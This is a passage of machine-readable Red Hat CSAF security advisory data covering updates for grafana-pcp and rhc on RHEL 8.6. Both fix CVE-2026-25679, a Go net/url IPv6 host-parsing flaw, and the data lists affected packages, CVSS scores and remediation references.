"grafana-pcp-debuginfo-0:3.2.0-4.el8_6.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.s390x"}, "product_reference": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.s390x", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64"}, "product_reference": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-4.el8_6.src as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.TUS:grafana-pcp-0:3.2.0-4.el8_6.src"}, "product_reference": "grafana-pcp-0:3.2.0-4.el8_6.src", "relates_to_product_reference": "AppStream-8.6.0.Z.TUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-4.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.TUS:grafana-pcp-0:3.2.0-4.el8_6.x86_64"}, "product_reference": "grafana-pcp-0:3.2.0-4.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.TUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.TUS:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64"}, "product_reference": "grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.TUS"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-8.6.0.Z.AUS:grafana-pcp-0:3.2.0-4.el8_6.src", "AppStream-8.6.0.Z.AUS:grafana-pcp-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.AUS:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.s390x", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.src", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.s390x", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:grafana-pcp-0:3.2.0-4.el8_6.src", "AppStream-8.6.0.Z.TUS:grafana-pcp-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-20T18:01:22+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-8.6.0.Z.AUS:grafana-pcp-0:3.2.0-4.el8_6.src", "AppStream-8.6.0.Z.AUS:grafana-pcp-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.AUS:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.s390x", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.src", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.s390x", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:grafana-pcp-0:3.2.0-4.el8_6.src", "AppStream-8.6.0.Z.TUS:grafana-pcp-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9093"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-8.6.0.Z.AUS:grafana-pcp-0:3.2.0-4.el8_6.src", "AppStream-8.6.0.Z.AUS:grafana-pcp-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.AUS:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.s390x", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.src", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.s390x", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:grafana-pcp-0:3.2.0-4.el8_6.src", "AppStream-8.6.0.Z.TUS:grafana-pcp-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-8.6.0.Z.AUS:grafana-pcp-0:3.2.0-4.el8_6.src", "AppStream-8.6.0.Z.AUS:grafana-pcp-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.AUS:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.s390x", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.src", "AppStream-8.6.0.Z.E4S:grafana-pcp-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.s390x", "AppStream-8.6.0.Z.E4S:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:grafana-pcp-0:3.2.0-4.el8_6.src", "AppStream-8.6.0.Z.TUS:grafana-pcp-0:3.2.0-4.el8_6.x86_64", "AppStream-8.6.0.Z.TUS:grafana-pcp-debuginfo-0:3.2.0-4.el8_6.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9093"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for rhc is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "rhc is a client tool and daemon that connects the system to Red Hat hosted services enabling system and subscription management.\n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:8851", "url": "https://access.redhat.com/errata/RHSA-2026:8851"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8851.json"}], "title": "Red Hat Security Advisory: rhc security update", "tracking": {"current_release_date": "2026-06-08T15:52:50+00:00", "generator": {"date": "2026-06-08T15:52:50+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:8851", "initial_release_date": "2026-04-20T01:48:19+00:00", "revision_history": [{"date": "2026-04-20T01:48:19+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-20T01:48:19+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:50+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream AUS (v.8.6)", "product": {"name": "Red Hat Enterprise Linux AppStream AUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.AUS", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_aus:8.6::appstream"}}}, {"category": "product_name", "name": "Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product": {"name": "Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_e4s:8.6::appstream"}}}, {"category": "product_name", "name": "Red Hat Enterprise Linux AppStream TUS (v.8.6)", "product": {"name": "Red Hat Enterprise Linux AppStream TUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.TUS", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_tus:8.6::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "rhc-1:0.2.1-14.el8_6.src", "product": {"name": "rhc-1:0.2.1-14.el8_6.src", "product_id": "rhc-1:0.2.1-14.el8_6.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc@0.2.1-14.el8_6?arch=src&epoch=1"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "rhc-1:0.2.1-14.el8_6.x86_64", "product": {"name": "rhc-1:0.2.1-14.el8_6.x86_64", "product_id": "rhc-1:0.2.1-14.el8_6.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc@0.2.1-14.el8_6?arch=x86_64&epoch=1"}}}, {"category": "product_version", "name": "rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "product": {"name": "rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "product_id": "rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc-debugsource@0.2.1-14.el8_6?arch=x86_64&epoch=1"}}}, {"category": "product_version", "name": "rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "product": {"name": "rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "product_id": "rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc-debuginfo@0.2.1-14.el8_6?arch=x86_64&epoch=1"}}}], "category": "architecture", "name": "x86_64"}, {"branches": [{"category": "product_version", "name": "rhc-1:0.2.1-14.el8_6.aarch64", "product": {"name": "rhc-1:0.2.1-14.el8_6.aarch64", "product_id": "rhc-1:0.2.1-14.el8_6.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc@0.2.1-14.el8_6?arch=aarch64&epoch=1"}}}, {"category": "product_version", "name": "rhc-debugsource-1:0.2.1-14.el8_6.aarch64", "product": {"name": "rhc-debugsource-1:0.2.1-14.el8_6.aarch64", "product_id": "rhc-debugsource-1:0.2.1-14.el8_6.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc-debugsource@0.2.1-14.el8_6?arch=aarch64&epoch=1"}}}, {"category": "product_version", "name": "rhc-debuginfo-1:0.2.1-14.el8_6.aarch64", "product": {"name": "rhc-debuginfo-1:0.2.1-14.el8_6.aarch64", "product_id": "rhc-debuginfo-1:0.2.1-14.el8_6.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc-debuginfo@0.2.1-14.el8_6?arch=aarch64&epoch=1"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "rhc-1:0.2.1-14.el8_6.ppc64le", "product": {"name": "rhc-1:0.2.1-14.el8_6.ppc64le", "product_id": "rhc-1:0.2.1-14.el8_6.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc@0.2.1-14.el8_6?arch=ppc64le&epoch=1"}}}, {"category": "product_version", "name": "rhc-debugsource-1:0.2.1-14.el8_6.ppc64le", "product": {"name": "rhc-debugsource-1:0.2.1-14.el8_6.ppc64le", "product_id": "rhc-debugsource-1:0.2.1-14.el8_6.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc-debugsource@0.2.1-14.el8_6?arch=ppc64le&epoch=1"}}}, {"category": "product_version", "name": "rhc-debuginfo-1:0.2.1-14.el8_6.ppc64le", "product": {"name": "rhc-debuginfo-1:0.2.1-14.el8_6.ppc64le", "product_id": "rhc-debuginfo-1:0.2.1-14.el8_6.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc-debuginfo@0.2.1-14.el8_6?arch=ppc64le&epoch=1"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "rhc-1:0.2.1-14.el8_6.s390x", "product": {"name": "rhc-1:0.2.1-14.el8_6.s390x", "product_id": "rhc-1:0.2.1-14.el8_6.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc@0.2.1-14.el8_6?arch=s390x&epoch=1"}}}, {"category": "product_version", "name": "rhc-debugsource-1:0.2.1-14.el8_6.s390x", "product": {"name": "rhc-debugsource-1:0.2.1-14.el8_6.s390x", "product_id": "rhc-debugsource-1:0.2.1-14.el8_6.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc-debugsource@0.2.1-14.el8_6?arch=s390x&epoch=1"}}}, {"category": "product_version", "name": "rhc-debuginfo-1:0.2.1-14.el8_6.s390x", "product": {"name": "rhc-debuginfo-1:0.2.1-14.el8_6.s390x", "product_id": "rhc-debuginfo-1:0.2.1-14.el8_6.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc-debuginfo@0.2.1-14.el8_6?arch=s390x&epoch=1"}}}], "category": "architecture", "name": "s390x"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.1-14.el8_6.src as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.AUS:rhc-1:0.2.1-14.el8_6.src"}, "product_reference": "rhc-1:0.2.1-14.el8_6.src", "relates_to_product_reference": "AppStream-8.6.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.1-14.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.AUS:rhc-1:0.2.1-14.el8_6.x86_64"}, "product_reference": "rhc-1:0.2.1-14.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debuginfo-1:0.2.1-14.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.AUS:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64"}, "product_reference": "rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debugsource-1:0.2.1-14.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.AUS:rhc-debugsource-1:0.2.1-14.el8_6.x86_64"}, "product_reference": "rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.1-14.el8_6.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.aarch64"}, "product_reference": "rhc-1:0.2.1-14.el8_6.aarch64", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.1-14.el8_6.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.ppc64le"}, "product_reference": "rhc-1:0.2.1-14.el8_6.ppc64le", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.1-14.el8_6.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.s390x"}, "product_reference": "rhc-1:0.2.1-14.el8_6.s390x", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.1-14.el8_6.src as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.src"}, "product_reference": "rhc-1:0.2.1-14.el8_6.src", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.1-14.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.x86_64"}, "product_reference": "rhc-1:0.2.1-14.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debuginfo-1:0.2.1-14.el8_6.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.aarch64"}, "product_reference": "rhc-debuginfo-1:0.2.1-14.el8_6.aarch64", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debuginfo-1:0.2.1-14.el8_6.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.ppc64le"}, "product_reference": "rhc-debuginfo-1:0.2.1-14.el8_6.ppc64le", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debuginfo-1:0.2.1-14.el8_6.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.s390x"}, "product_reference": "rhc-debuginfo-1:0.2.1-14.el8_6.s390x", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debuginfo-1:0.2.1-14.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64"}, "product_reference": "rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debugsource-1:0.2.1-14.el8_6.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.aarch64"}, "product_reference": "rhc-debugsource-1:0.2.1-14.el8_6.aarch64", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debugsource-1:0.2.1-14.el8_6.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.ppc64le"}, "product_reference": "rhc-debugsource-1:0.2.1-14.el8_6.ppc64le", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debugsource-1:0.2.1-14.el8_6.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.s390x"}, "product_reference": "rhc-debugsource-1:0.2.1-14.el8_6.s390x", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debugsource-1:0.2.1-14.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)", "product_id": "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.x86_64"}, "product_reference": "rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.1-14.el8_6.src as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.TUS:rhc-1:0.2.1-14.el8_6.src"}, "product_reference": "rhc-1:0.2.1-14.el8_6.src", "relates_to_product_reference": "AppStream-8.6.0.Z.TUS"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.1-14.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.TUS:rhc-1:0.2.1-14.el8_6.x86_64"}, "product_reference": "rhc-1:0.2.1-14.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.TUS"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debuginfo-1:0.2.1-14.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.TUS:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64"}, "product_reference": "rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.TUS"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debugsource-1:0.2.1-14.el8_6.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)", "product_id": "AppStream-8.6.0.Z.TUS:rhc-debugsource-1:0.2.1-14.el8_6.x86_64"}, "product_reference": "rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "relates_to_product_reference": "AppStream-8.6.0.Z.TUS"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-8.6.0.Z.AUS:rhc-1:0.2.1-14.el8_6.src", "AppStream-8.6.0.Z.AUS:rhc-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.AUS:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.AUS:rhc-debugsource-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.s390x", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.src", "AppStream-8.6.0.Z.E4S:rhc-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.s390x", "AppStream-8.6.0.Z.E4S:rhc-debuginfo-1:0.2.1-14.el8_6.x86_64", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.aarch64", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.ppc64le", "AppStream-8.6.0.Z.E4S:rhc-debugsource-1:0.2.1-14.el8_6.s390x", 